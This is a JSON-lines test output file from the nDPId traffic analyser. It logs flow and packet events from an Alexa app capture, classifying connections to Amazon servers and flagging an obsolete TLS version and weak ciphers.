+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1490976177026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976177026,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWmFAAEARM1GsECrYrBAqARDYADUALXE1hGEBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 